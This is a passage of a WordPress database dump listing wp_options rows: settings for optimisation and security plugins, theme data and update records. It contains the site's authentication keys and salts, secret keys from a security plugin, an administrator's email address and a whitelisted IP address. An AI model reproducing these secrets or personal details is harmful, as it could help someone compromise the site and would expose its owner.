s:15:\"banner_appeared\";s:2:\"no\";s:9:\"is_active\";s:2:\"no\";s:9:\"timestamp\";s:0:\"\";}\";','yes'),(85106,'sfsi_currentDate','2020-10-09 12:00:32','yes'),(85107,'sfsi_showNextBannerDate','14 day','yes'),(85108,'sfsi_cycleDate','180 day','yes'),(85109,'sfsi_loyaltyDate','180 day','yes'),(85110,'sfsi_fb_count','','yes'),(85116,'wpo_minify_config','a:47:{s:5:\"debug\";b:0;s:19:\"enabled_css_preload\";b:0;s:18:\"enabled_js_preload\";b:0;s:11:\"hpreconnect\";s:0:\"\";s:8:\"hpreload\";s:0:\"\";s:7:\"loadcss\";b:0;s:10:\"remove_css\";b:0;s:17:\"critical_path_css\";s:0:\"\";s:31:\"critical_path_css_is_front_page\";s:0:\"\";s:30:\"preserve_settings_on_uninstall\";b:1;s:22:\"disable_when_logged_in\";b:0;s:16:\"default_protocol\";s:7:\"dynamic\";s:17:\"html_minification\";b:1;s:16:\"clean_header_one\";b:0;s:13:\"emoji_removal\";b:1;s:18:\"merge_google_fonts\";b:1;s:18:\"remove_googlefonts\";b:0;s:13:\"gfonts_method\";s:6:\"inline\";s:15:\"fawesome_method\";s:6:\"inline\";s:10:\"enable_css\";b:1;s:23:\"enable_css_minification\";b:1;s:21:\"enable_merging_of_css\";b:1;s:23:\"remove_print_mediatypes\";b:0;s:10:\"inline_css\";b:0;s:9:\"enable_js\";b:1;s:22:\"enable_js_minification\";b:1;s:20:\"enable_merging_of_js\";b:1;s:15:\"enable_defer_js\";s:10:\"individual\";s:13:\"defer_js_type\";s:5:\"defer\";s:12:\"defer_jquery\";b:1;s:18:\"enable_js_trycatch\";b:0;s:19:\"exclude_defer_login\";b:1;s:7:\"cdn_url\";s:0:\"\";s:9:\"cdn_force\";b:0;s:9:\"async_css\";s:0:\"\";s:8:\"async_js\";s:0:\"\";s:24:\"disable_css_inline_merge\";b:1;s:6:\"ualist\";a:8:{i:0;s:12:\"x11.*fox\\/54\";i:1;s:20:\"oid\\s4.*xus.*ome\\/62\";i:2;s:12:\"x11.*ome\\/62\";i:3;s:5:\"oobot\";i:4;s:5:\"ighth\";i:5;s:5:\"tmetr\";i:6;s:6:\"eadles\";i:7;s:5:\"ingdo\";}s:9:\"blacklist\";s:441:\"/html5shiv.js\n/html5shiv-printshiv.min.js\n/excanvas.js\n/avada-ie9.js\n/respond.js\n/respond.min.js\n/selectivizr.js\n/Avada/assets/css/ie.css\n/html5.js\n/IE9.js\n/fusion-ie9.js\n/vc_lte_ie9.min.css\n/old-ie.css\n/ie.css\n/vc-ie8.min.css\n/mailchimp-for-wp/assets/js/third-party/placeholders.min.js\n/assets/js/plugins/wp-enqueue/min/webfontloader.js\n/a.optnmstr.com/app/js/api.min.js\n/pixelyoursite/js/public.js\n/assets/js/wcdrip-drip.js\n/instantpage.js\";s:11:\"ignore_list\";s:561:\"/genericons.css\n/Avada/assets/js/main.min.js\n/woocommerce-product-search/js/product-search.js\n/includes/builder/scripts/frontend-builder-scripts.js\n/assets/js/jquery.themepunch.tools.min.js\n/js/TweenMax.min.js\n/jupiter/assets/js/min/full-scripts\n/wp-content/themes/Divi/core/admin/js/react-dom.production.min.js\n/LayerSlider/static/layerslider/js/greensock.js\n/themes/kalium/assets/js/main.min.js\n/elementor/assets/js/common.min.js\n/elementor/assets/js/frontend.min.js\n/elementor-pro/assets/js/frontend.min.js\n/wp-includes/js/mediaelement/wp-mediaelement.min.js\";s:10:\"exclude_js\";s:0:\"\";s:11:\"exclude_css\";s:0:\"\";s:23:\"edit_default_exclutions\";b:0;s:18:\"merge_allowed_urls\";s:0:\"\";s:7:\"enabled\";b:0;s:17:\"last-cache-update\";i:0;s:14:\"plugin_version\";s:5:\"0.0.0\";}','yes'),(85123,'wp-optimize-failed_task_count','5','yes'),(86862,'recovery_keys','a:0:{}','yes'),(86863,'wp_page_for_privacy_policy','0','yes'),(86864,'show_comments_cookies_opt_in','1','yes'),(86865,'admin_email_lifespan','1645449391','yes'),(86866,'disallowed_keys','','no'),(86867,'comment_previously_approved','1','yes'),(86868,'auto_plugin_theme_update_emails','a:0:{}','no'),(86869,'auto_update_core_dev','enabled','yes'),(86870,'auto_update_core_minor','enabled','yes'),(86871,'auto_update_core_major','unset','yes'),(86872,'finished_updating_comment_type','1','yes'),(86873,'db_upgraded','','yes'),(86875,'can_compress_scripts','0','no'),(86897,'profitquery','a:2:{s:8:\"settings\";a:2:{s:23:\"pq_aio_later_click_time\";i:1613065073;s:30:\"pq_aio_later_update_click_time\";i:1613086673;}s:21:\"pq_aio_widgets_loaded\";i:1;}','yes'),(86898,'widget_akismet_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(86938,'_transient_health-check-site-status-result','{\"good\":14,\"recommended\":5,\"critical\":0}','yes'),(87359,'nonce_key','PCxqN0|b-p3l.<X4uM>d5OV?dz&|svi=}F>Jq~>2X}xp^Y%O42 EGB6HJCb ?%te','no'),(87360,'nonce_salt','b_zniM[C@>Hc8U|dXk/i]PPlj-*]c#V,LX<202Er)o`ibP8R48b9(<3U )=eD.8H','no'),(88520,'secure_auth_key','J:_A.IpO1s)pyVT5EBD:*O|oc5;Q^uV}uP6_6Rjw>|T(b#[0McW$/B|$Pv6/3?-8','no'),(88521,'secure_auth_salt','KQjMgtE%``??~.M/{9WwU5]ZE*J1?9&z3&-9*+ :zO!V?<m n`QB,y+Gpj-Rxq,W','no'),(88522,'logged_in_key','yp~N&D9+/|aFd$B}`zhUp3ri%rMGoX.*oX5NKh9x]xJDoMk[&.p=sh=J?au`g([9','no'),(88523,'logged_in_salt','0^&:CUkge@/2/iaN{FZ~;![b=|l&.M@5_j8WI4&U2r36@QaGeKK^EI,Fk]/FTc75','no'),(91912,'wfls_last_role_change','1629381769','no'),(91913,'wordfence_version','7.5.5','yes'),(91914,'wordfence_case','1','yes'),(91915,'wordfence_installed','1','yes'),(91916,'wordfenceActivated','0','yes'),(91917,'active_plugins','a:0:{}','yes'),(91918,'wf_plugin_act_error','','yes'),(91925,'aiowpsec_db_version','1.9','yes'),(91926,'aio_wp_security_configs','a:95:{s:19:\"aiowps_enable_debug\";s:0:\"\";s:36:\"aiowps_remove_wp_generator_meta_info\";s:0:\"\";s:25:\"aiowps_prevent_hotlinking\";s:0:\"\";s:28:\"aiowps_enable_login_lockdown\";s:0:\"\";s:28:\"aiowps_allow_unlock_requests\";s:0:\"\";s:25:\"aiowps_max_login_attempts\";s:1:\"3\";s:24:\"aiowps_retry_time_period\";s:1:\"5\";s:26:\"aiowps_lockout_time_length\";s:2:\"60\";s:28:\"aiowps_set_generic_login_msg\";s:0:\"\";s:26:\"aiowps_enable_email_notify\";s:0:\"\";s:20:\"aiowps_email_address\";s:23:\"bensykes@bensykes.co.uk\";s:27:\"aiowps_enable_forced_logout\";s:0:\"\";s:25:\"aiowps_logout_time_period\";s:2:\"60\";s:39:\"aiowps_enable_invalid_username_lockdown\";s:0:\"\";s:43:\"aiowps_instantly_lockout_specific_usernames\";a:0:{}s:32:\"aiowps_unlock_request_secret_key\";s:20:\"2wzx8y35gchkulvvkflh\";s:35:\"aiowps_lockdown_enable_whitelisting\";s:0:\"\";s:36:\"aiowps_lockdown_allowed_ip_addresses\";s:0:\"\";s:26:\"aiowps_enable_whitelisting\";s:1:\"1\";s:27:\"aiowps_allowed_ip_addresses\";s:14:\"185.175.113.72\";s:27:\"aiowps_enable_login_captcha\";s:1:\"1\";s:34:\"aiowps_enable_custom_login_captcha\";s:1:\"1\";s:31:\"aiowps_enable_woo_login_captcha\";s:0:\"\";s:34:\"aiowps_enable_woo_register_captcha\";s:0:\"\";s:38:\"aiowps_enable_woo_lostpassword_captcha\";s:0:\"\";s:25:\"aiowps_captcha_secret_key\";s:20:\"j2xxh6yhh1xxrz4av284\";s:42:\"aiowps_enable_manual_registration_approval\";s:0:\"\";s:39:\"aiowps_enable_registration_page_captcha\";s:0:\"\";s:35:\"aiowps_enable_registration_honeypot\";s:0:\"\";s:27:\"aiowps_enable_random_prefix\";s:0:\"\";s:31:\"aiowps_enable_automated_backups\";s:0:\"\";s:26:\"aiowps_db_backup_frequency\";s:1:\"4\";s:25:\"aiowps_db_backup_interval\";s:1:\"2\";s:26:\"aiowps_backup_files_stored\";s:1:\"2\";s:32:\"aiowps_send_backup_email_address\";s:0:\"\";s:27:\"aiowps_backup_email_address\";s:23:\"bensykes@bensykes.co.uk\";s:27:\"aiowps_disable_file_editing\";s:1:\"1\";s:37:\"aiowps_prevent_default_wp_file_access\";s:1:\"1\";s:22:\"aiowps_system_log_file\";s:9:\"error_log\";s:26:\"aiowps_enable_blacklisting\";s:0:\"\";s:26:\"aiowps_banned_ip_addresses\";s:0:\"\";s:28:\"aiowps_enable_basic_firewall\";s:0:\"\";s:27:\"aiowps_max_file_upload_size\";s:2:\"10\";s:31:\"aiowps_enable_pingback_firewall\";s:0:\"\";s:38:\"aiowps_disable_xmlrpc_pingback_methods\";s:0:\"\";s:34:\"aiowps_block_debug_log_file_access\";s:0:\"\";s:26:\"aiowps_disable_index_views\";s:0:\"\";s:30:\"aiowps_disable_trace_and_track\";s:0:\"\";s:28:\"aiowps_forbid_proxy_comments\";s:0:\"\";s:29:\"aiowps_deny_bad_query_strings\";s:0:\"\";s:34:\"aiowps_advanced_char_string_filter\";s:0:\"\";s:25:\"aiowps_enable_5g_firewall\";s:0:\"\";s:25:\"aiowps_enable_6g_firewall\";s:0:\"\";s:26:\"aiowps_enable_custom_rules\";s:0:\"\";s:32:\"aiowps_place_custom_rules_at_top\";s:0:\"\";s:19:\"aiowps_custom_rules\";s:0:\"\";s:25:\"aiowps_enable_404_logging\";s:0:\"\";s:28:\"aiowps_enable_404_IP_lockout\";s:0:\"\";s:30:\"aiowps_404_lockout_time_length\";s:2:\"60\";s:28:\"aiowps_404_lock_redirect_url\";s:16:\"http://127.0.0.1\";s:31:\"aiowps_enable_rename_login_page\";s:0:\"\";s:28:\"aiowps_enable_login_honeypot\";s:1:\"1\";s:43:\"aiowps_enable_brute_force_attack_prevention\";s:0:\"\";s:30:\"aiowps_brute_force_secret_word\";s:0:\"\";s:24:\"aiowps_cookie_brute_test\";s:29:\"aiowps_cookie_test_t5qy5n0utg\";s:44:\"aiowps_cookie_based_brute_force_redirect_url\";s:16:\"http://127.0.0.1\";s:59:\"aiowps_brute_force_attack_prevention_pw_protected_exception\";s:0:\"\";s:51:\"aiowps_brute_force_attack_prevention_ajax_exception\";s:0:\"\";s:19:\"aiowps_site_lockout\";s:0:\"\";s:23:\"aiowps_site_lockout_msg\";s:0:\"\";s:30:\"aiowps_enable_spambot_blocking\";s:0:\"\";s:29:\"aiowps_enable_comment_captcha\";s:0:\"\";s:31:\"aiowps_enable_autoblock_spam_ip\";s:0:\"\";s:33:\"aiowps_spam_ip_min_comments_block\";s:0:\"\";s:33:\"aiowps_enable_bp_register_captcha\";s:0:\"\";s:35:\"aiowps_enable_bbp_new_topic_captcha\";s:0:\"\";s:32:\"aiowps_enable_automated_fcd_scan\";s:0:\"\";s:25:\"aiowps_fcd_scan_frequency\";s:1:\"4\";s:24:\"aiowps_fcd_scan_interval\";s:1:\"2\";s:28:\"aiowps_fcd_exclude_filetypes\";s:0:\"\";s:24:\"aiowps_fcd_exclude_files\";s:0:\"\";s:26:\"aiowps_send_fcd_scan_email\";s:0:\"\";s:29:\"aiowps_fcd_scan_email_address\";s:23:\"bensykes@bensykes.co.uk\";s:27:\"aiowps_fcds_change_detected\";b:0;s:22:\"aiowps_copy_protection\";s:0:\"\";s:40:\"aiowps_prevent_site_display_inside_frame\";s:0:\"\";s:32:\"aiowps_prevent_users_enumeration\";s:0:\"\";s:42:\"aiowps_disallow_unauthorized_rest_requests\";s:0:\"\";s:25:\"aiowps_ip_retrieve_method\";s:1:\"0\";s:25:\"aiowps_recaptcha_site_key\";s:0:\"\";s:27:\"aiowps_recaptcha_secret_key\";s:0:\"\";s:24:\"aiowps_default_recaptcha\";s:0:\"\";s:19:\"aiowps_fcd_filename\";s:26:\"aiowps_fcd_data_h6mlprq63t\";s:26:\"aiowps_cookie_test_success\";s:1:\"1\";s:35:\"aiowps_enable_lost_password_captcha\";s:1:\"1\";}','yes'),(91929,'_cerber_db_errors','a:7:{i:0;a:3:{i:0;s:54:\"Table \'westonspiritorguk.wp_cerber_sets\' doesn\'t exist\";i:1;s:73:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"_nexus_mode\" AND the_id = 0\";i:2;d:1624623537.02509;}i:1;a:3:{i:0;s:54:\"Table \'westonspiritorguk.wp_cerber_sets\' doesn\'t exist\";i:1;s:74:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"admin_notice\" AND the_id = 0\";i:2;d:1624623537.036012;}i:2;a:3:{i:0;s:54:\"Table \'westonspiritorguk.wp_cerber_sets\' doesn\'t exist\";i:1;s:101:\"INSERT INTO wp_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"admin_notice\",0,\"a:0:{}\",0)\";i:2;d:1624623537.036068;}i:3;a:3:{i:0;s:54:\"Table \'westonspiritorguk.wp_cerber_sets\' doesn\'t exist\";i:1;s:75:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"admin_message\" AND the_id = 0\";i:2;d:1624623537.036113;}i:4;a:3:{i:0;s:54:\"Table \'westonspiritorguk.wp_cerber_sets\' doesn\'t exist\";i:1;s:102:\"INSERT INTO wp_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"admin_message\",0,\"a:0:{}\",0)\";i:2;d:1624623537.036152;}i:5;a:3:{i:0;s:54:\"Table \'westonspiritorguk.wp_cerber_sets\' doesn\'t exist\";i:1;s:79:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"cerber_admin_wide\" AND the_id = 0\";i:2;d:1624623537.036191;}i:6;a:3:{i:0;s:54:\"Table \'westonspiritorguk.wp_cerber_sets\' doesn\'t exist\";i:1;s:100:\"INSERT INTO wp_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"cerber_admin_wide\",0,\"\",0)\";i:2;d:1624623537.036228;}}','no'),(91944,'_cerber_up','a:2:{s:1:\"v\";s:5:\"8.8.5\";s:1:\"t\";i:1629805983;}','no'),(91945,'cerber_admin_info','<h1>Highlights from WP Cerber Security 8.8.5</h1><ul><li>New: Quick user activity analytics (user insights) with filtering links on the Activity and Live Traffic log pages. Select a user to see how it works.</li><li>New: Quick IP address activity and analytics (IP insights) with filtering links on the Activity and Live Traffic log pages. Select an IP address to see how it works.</li><li>Improved: The selected user profile is displayed when filtering log entries by the user login or using the username search on the Activity log page.</li><li>Improved: The IP address details and analytics are displayed when filtering log entries by the IP address or using the IP address search on the Activity log page.</li><li>Improved: Implemented AJAX rendering of the plugin admin pages for faster loading and more convenient navigation through WP Cerber’s admin pages</li><li>Improved: To load the Users admin page faster, the user table columns generated by WP Cerber are now loaded via AJAX.</li><li>Improved: Highlighting the selected filtering link in the navigation bar on the Activity and Live Traffic log pages.</li></ul><p style=\"margin-top: 18px; line-height: 1.3;\"><span class=\"dashicons-before dashicons-info-outline\"></span>  &nbsp; <a href=\"https://wpcerber.com/?plugin_version=8.8.5\" target=\"_blank\">Read more on wpcerber.com</a></p>  <h2 style=\"margin-top: 28px;\">We need your support to keep moving forward</h2>\r\n                    <table style=\"margin-top: 20px;\"><tr><td></td><td style=\"padding-top: 0;\">By sharing your unique opinion on WP Cerber, you help the engineers behind the plugin make greater progress and help other professionals find the right software. You can leave your review on one of the following websites. Feel free to use your native language. Thanks!\r\n                    </td></tr></table>\r\n                       \r\n                    <p><a href=\"https://www.trustpilot.com/evaluate/wpcerber.com\" target=\"_blank\">Leave review on Trustpilot</a>\r\n                    &nbsp;|&nbsp; \r\n                    <a href=\"https://www.g2.com/products/cerber-security-antispam-malware-scan/reviews/start\" target=\"_blank\">Leave review on G2.COM</a><p style=\"text-align:right; padding-right: 20px;\">\r\n    		    <input type=\"button\" class=\"button button-primary cerber-dismiss\" value=\" &nbsp; Awesome! &nbsp; \"/></p>','no'),(91946,'cerber-groove','12V8obYnZlkEpMT7','no'),(91947,'cerber-groove-x','a:2:{i:0;s:32:\"MeBznmo9qEC4JLOkPt6vhlYsc1jyfgw0\";i:1;s:29:\"mWdjp3YOL7MN28KBRkhSrzVqHTl0c\";}','no'),(91948,'cerber-main','a:38:{s:9:\"boot-mode\";i:0;s:8:\"attempts\";i:5;s:6:\"period\";i:30;s:7:\"lockout\";i:60;s:8:\"agperiod\";i:24;s:7:\"aglocks\";i:2;s:6:\"aglast\";i:4;s:10:\"limitwhite\";i:0;s:11:\"nologinhint\";i:0;s:15:\"nologinhint_msg\";s:0:\"\";s:10:\"nopasshint\";i:0;s:14:\"nopasshint_msg\";s:0:\"\";s:5:\"proxy\";i:0;s:10:\"cookiepref\";s:0:\"\";s:6:\"subnet\";i:0;s:8:\"nonusers\";i:0;s:7:\"wplogin\";i:0;s:10:\"noredirect\";i:0;s:7:\"page404\";i:1;s:9:\"loginpath\";s:0:\"\";s:9:\"loginnowp\";i:0;s:13:\"logindeferred\";i:0;s:10:\"citadel_on\";s:1:\"1\";s:7:\"cilimit\";i:200;s:8:\"ciperiod\";i:15;s:10:\"ciduration\";i:60;s:8:\"cinotify\";i:1;s:7:\"keeplog\";i:30;s:12:\"keeplog_auth\";i:30;s:8:\"ip_extra\";i:1;s:9:\"cerberlab\";i:0;s:11:\"cerberproto\";i:0;s:7:\"usefile\";i:0;s:10:\"dateformat\";s:0:\"\";s:10:\"plain_date\";i:0;s:10:\"admin_lang\";i:0;s:14:\"top_admin_menu\";i:0;s:14:\"no_white_my_ip\";i:0;}','no'),(91949,'cerber-hardening','a:14:{s:8:\"stopenum\";i:1;s:15:\"stopenum_oembed\";i:1;s:16:\"stopenum_sitemap\";i:0;s:8:\"adminphp\";i:0;s:8:\"phpnoupl\";i:0;s:8:\"nophperr\";i:1;s:6:\"xmlrpc\";i:0;s:7:\"nofeeds\";i:0;s:10:\"norestuser\";i:1;s:6:\"norest\";i:0;s:8:\"restauth\";i:1;s:9:\"restroles\";a:1:{i:0;s:13:\"administrator\";}s:9:\"restwhite\";a:2:{i:0;s:6:\"oembed\";i:1;s:14:\"wp-site-health\";}s:9:\"cleanhead\";i:1;}','no'),(91950,'cerber-users','a:19:{s:8:\"authonly\";i:0;s:11:\"authonlyacl\";i:0;s:11:\"authonlymsg\";s:68:\"Only registered and logged in users are allowed to view this website\";s:13:\"authonlyredir\";s:0:\"\";s:8:\"regwhite\";i:0;s:12:\"regwhite_msg\";s:0:\"\";s:12:\"reglimit_num\";i:3;s:12:\"reglimit_min\";i:60;s:6:\"emrule\";i:0;s:6:\"emlist\";a:0:{}s:10:\"prohibited\";a:0:{}s:7:\"app_pwd\";i:1;s:11:\"auth_expire\";s:0:\"\";s:8:\"usersort\";s:0:\"\";s:11:\"pdata_erase\";i:0;s:14:\"pdata_sessions\";i:0;s:12:\"pdata_export\";i:0;s:9:\"pdata_act\";i:0;s:9:\"pdata_trf\";a:0:{}}','no'),(91951,'cerber-antispam','a:10:{s:8:\"botscomm\";i:1;s:7:\"botsreg\";i:0;s:7:\"botsany\";i:0;s:8:\"botssafe\";i:0;s:10:\"botsnoauth\";i:1;s:10:\"customcomm\";i:0;s:9:\"botswhite\";s:0:\"\";s:8:\"spamcomm\";i:0;s:10:\"trashafter\";i:7;s:18:\"trashafter-enabled\";i:0;}','no'),(91952,'cerber-recaptcha','a:14:{s:7:\"sitekey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:9:\"invirecap\";i:0;s:10:\"recaplogin\";i:0;s:9:\"recaplost\";i:0;s:8:\"recapreg\";i:0;s:13:\"recapwoologin\";i:0;s:12:\"recapwoolost\";i:0;s:11:\"recapwooreg\";i:0;s:8:\"recapcom\";i:0;s:12:\"recapcomauth\";i:0;s:16:\"recaptcha-period\";i:60;s:16:\"recaptcha-number\";i:3;s:16:\"recaptcha-within\";i:30;}','no'),(91953,'cerber-notifications','a:11:{s:6:\"notify\";i:1;s:5:\"above\";i:3;s:5:\"email\";s:0:\"\";s:9:\"emailrate\";i:12;s:14:\"notify-new-ver\";s:1:\"1\";s:7:\"pbtoken\";s:0:\"\";s:8:\"pbdevice\";s:0:\"\";s:12:\"wreports-day\";s:1:\"1\";s:13:\"wreports-time\";i:9;s:12:\"email-report\";s:0:\"\";s:13:\"enable-report\";s:1:\"1\";}','no'),(91954,'cerber-traffic','a:22:{s:9:\"tienabled\";s:1:\"1\";s:9:\"tiipwhite\";i:0;s:7:\"tiwhite\";s:0:\"\";s:8:\"tierrmon\";s:1:\"1\";s:11:\"tierrnoauth\";i:1;s:6:\"timode\";s:1:\"3\";s:12:\"tilogrestapi\";i:0;s:11:\"tilogxmlrpc\";i:0;s:9:\"tinocrabs\";s:1:\"1\";s:8:\"tinolocs\";a:0:{}s:6:\"tinoua\";a:0:{}s:8:\"tifields\";i:0;s:6:\"timask\";s:0:\"\";s:6:\"tihdrs\";i:0;s:11:\"tihdrs_sent\";i:0;s:6:\"tisenv\";i:0;s:7:\"ticandy\";i:0;s:12:\"ticandy_sent\";i:0;s:8:\"tiphperr\";i:0;s:11:\"tithreshold\";s:0:\"\";s:9:\"tikeeprec\";i:30;s:14:\"tikeeprec_auth\";i:30;}','no'),(91955,'cerber-user_shield','a:9:{s:7:\"ds_4acc\";i:0;s:13:\"ds_regs_roles\";a:0:{}s:10:\"ds_add_acc\";a:1:{i:0;s:13:\"administrator\";}s:11:\"ds_edit_acc\";a:1:{i:0;s:13:\"administrator\";}s:11:\"ds_4acc_acl\";i:0;s:9:\"ds_4roles\";i:0;s:11:\"ds_add_role\";a:1:{i:0;s:13:\"administrator\";}s:12:\"ds_edit_role\";a:1:{i:0;s:13:\"administrator\";}s:13:\"ds_4roles_acl\";i:0;}','no'),(91956,'cerber-opt_shield','a:4:{s:8:\"ds_4opts\";i:0;s:14:\"ds_4opts_roles\";a:1:{i:0;s:13:\"administrator\";}s:13:\"ds_4opts_list\";a:7:{s:11:\"admin_email\";i:1;s:12:\"default_role\";i:1;s:4:\"home\";i:1;s:7:\"siteurl\";i:1;s:18:\"users_can_register\";i:1;s:14:\"active_plugins\";i:1;s:8:\"template\";i:1;}s:12:\"ds_4opts_acl\";i:0;}','no'),(91957,'cerber-scanner','a:10:{s:8:\"scan_cpt\";a:0:{}s:9:\"scan_uext\";a:0:{}s:12:\"scan_exclude\";a:0:{}s:9:\"scan_inew\";s:1:\"1\";s:9:\"scan_imod\";s:1:\"1\";s:10:\"scan_chmod\";i:0;s:8:\"scan_tmp\";i:0;s:9:\"scan_sess\";i:0;s:10:\"scan_debug\";i:0;s:13:\"scan_qcleanup\";s:2:\"30\";}','no'),(91958,'cerber-schedule','a:8:{s:11:\"scan_aquick\";i:0;s:10:\"scan_afull\";s:5:\"05:00\";s:18:\"scan_afull-enabled\";i:0;s:10:\"scan_reinc\";a:5:{i:3;i:1;i:4;i:1;i:15;i:1;i:50;i:1;i:51;i:1;}s:12:\"scan_relimit\";i:3;s:10:\"scan_isize\";i:0;s:12:\"scan_ierrors\";i:0;s:10:\"email-scan\";s:0:\"\";}','no'),(91959,'cerber-policies','a:9:{s:13:\"scan_delunatt\";i:0;s:11:\"scan_delupl\";a:0:{}s:14:\"scan_delunwant\";i:0;s:15:\"scan_recover_wp\";i:0;s:15:\"scan_recover_pl\";i:0;s:14:\"scan_nodeltemp\";i:0;s:14:\"scan_nodelsess\";i:0;s:13:\"scan_delexdir\";a:0:{}s:13:\"scan_delexext\";a:0:{}}','no'),(91960,'cerber-nexus_master','a:7:{s:13:\"master_tolist\";i:1;s:13:\"master_swshow\";i:1;s:14:\"master_at_site\";i:1;s:13:\"master_locale\";i:0;s:9:\"master_dt\";i:0;s:9:\"master_tz\";i:0;s:11:\"master_diag\";i:0;}','no'),(91961,'cerber-nexus-slave','a:3:{s:9:\"slave_ips\";s:0:\"\";s:12:\"slave_access\";i:2;s:10:\"slave_diag\";i:0;}','no'),(91962,'cerber-antibot','a:2:{i:0;a:2:{i:0;a:2:{i:0;s:14:\"tgvWlEqJFTkSZs\";i:1;s:15:\"D[rxKMXgQU5dqil\";}i:1;a:2:{i:0;s:12:\"_AZaHIJYjiO-\";i:1;s:11:\"UdIu87KxltL\";}}i:1;a:3:{i:0;a:2:{i:0;s:16:\"gaxmjtfJdAzeUyNX\";i:1;s:8:\"49Ui3QMj\";}i:1;a:2:{i:0;s:7:\"WlQeKR-\";i:1;s:12:\"XRI*PglkC_mF\";}i:2;a:2:{i:0;s:13:\"ZSvLIMakUcDCx\";i:1;s:9:\"vDMzK_YlA\";}}}','no'),(91972,'wordfence_syncAttackDataAttempts','0','no'),(91973,'wordfence_syncingAttackData','0','no'),(91974,'wordfence_lastSyncAttackData','1629308693','no'),(91985,'https_detection_errors','a:0:{}','yes'),(92009,'recovery_mode_email_last_sent','1624955698','yes'),(93271,'_cerber_report','a:2:{i:0;i:1629709809;i:1;b:1;}','no'),(97028,'_cerber_notify_new','a:2:{i:0;s:3:\"8.9\";i:1;s:5:\"8.9.3\";}','no'),(103229,'widget_block','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(103236,'wp_force_deactivated_plugins','a:0:{}','yes'),(103271,'category_children','a:0:{}','yes'),(103285,'auth_key','d;safQ0`$Wgs66r!-*Sm|$I@<Xa:Fqh|M,S}wa*]kFM~8}=I&4duZ~<C0fqw-2Mj','no'),(103286,'auth_salt','}=mJXi/X51i$F:#Mu@{OQ!W9x18_ryN;i&K<C)?:iAs?!!R?Zl$48=8,q3Fpim0|','no'),(105114,'theme_mods_twentynineteen','a:4:{i:0;b:0;s:18:\"nav_menu_locations\";a:2:{s:6:\"footer\";i:0;s:6:\"menu-1\";i:10;}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1631107608;s:4:\"data\";a:2:{s:19:\"wp_inactive_widgets\";a:5:{i:0;s:6:\"meta-2\";i:1;s:12:\"categories-2\";i:2;s:14:\"recent-posts-4\";i:3;s:6:\"text-5\";i:4;s:6:\"text-3\";}s:9:\"sidebar-1\";a:5:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:6:\"text-4\";i:3;s:17:\"recent-comments-2\";i:4;s:10:\"archives-2\";}}}}','yes'),(106226,'theme_mods_busicare-dark','a:2:{s:18:\"custom_css_post_id\";i:-1;s:18:\"nav_menu_locations\";a:1:{s:16:\"busicare-primary\";i:10;}}','yes'),(106227,'theme_switch_menu_locations','a:2:{s:6:\"footer\";i:0;s:6:\"menu-1\";i:10;}','yes'),(106385,'_site_transient_update_plugins','O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1640716362;s:8:\"response\";a:0:{}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:0:{}}','no'),(111944,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:1:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:6:\"latest\";s:8:\"download\";s:65:\"https://downloads.wordpress.org/release/en_GB/wordpress-5.8.2.zip\";s:6:\"locale\";s:5:\"en_GB\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:65:\"https://downloads.wordpress.org/release/en_GB/wordpress-5.8.2.zip\";s:10:\"no_content\";s:0:\"\";s:11:\"new_bundled\";s:0:\"\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"5.8.2\";s:7:\"version\";s:5:\"5.8.2\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.6\";s:15:\"partial_version\";s:0:\"\";}}s:12:\"last_checked\";i:1640716362;s:15:\"version_checked\";s:5:\"5.8.2\";s:12:\"translations\";a:0:{}}','no'),(117118,'_site_transient_timeout_theme_roots','1640718163','no'),(117119,'_site_transient_theme_roots','a:5:{s:13:\"busicare-dark\";s:7:\"/themes\";s:8:\"busicare\";s:7:\"/themes\";s:14:\"twentynineteen\";s:7:\"/themes\";s:12:\"twentytwenty\";s:7:\"/themes\";s:15:\"twentytwentyone\";s:7:\"/themes\";}','no'),(117120,'_site_transient_update_themes','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1640716363;s:7:\"checked\";a:5:{s:13:\"busicare-dark\";s:3:\"0.2\";s:8:\"busicare\";s:5:\"1.1.1\";s:14:\"twentynineteen\";s:3:\"2.1\";s:12:\"twentytwenty\";s:3:\"1.8\";s:15:\"twentytwentyone\";s:3:\"1.4\";}s:8:\"response\";a:2:{s:13:\"busicare-dark\";a:6:{s:5:\"theme\";s:13:\"busicare-dark\";s:11:\"new_version\";s:3:\"1.0\";s:3:\"url\";s:43:\"https://wordpress.org/themes/busicare-dark/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/busicare-dark.1.0.zip\";s:8:\"requires\";s:3:\"4.5\";s:12:\"requires_php\";s:3:\"5.4\";}s:8:\"busicare\";a:6:{s:5:\"theme\";s:8:\"busicare\";s:11:\"new_version\";s:5:\"1.1.6\";s:3:\"url\";s:38:\"https://wordpress.org/themes/busicare/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/theme/busicare.1.1.6.zip\";s:8:\"requires\";s:3:\"4.5\";s:12:\"requires_php\";s:3:\"5.4\";}}s:9:\"no_update\";a:3:{s:14:\"twentynineteen\";a:6:{s:5:\"theme\";s:14:\"twentynineteen\";s:11:\"new_version\";s:3:\"2.1\";s:3:\"url\";s:44:\"https://wordpress.org/themes/twentynineteen/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/twentynineteen.2.1.zip\";s:8:\"requires\";s:5:\"4.9.6\";s:12:\"requires_php\";s:5:\"5.2.4\";}s:12:\"t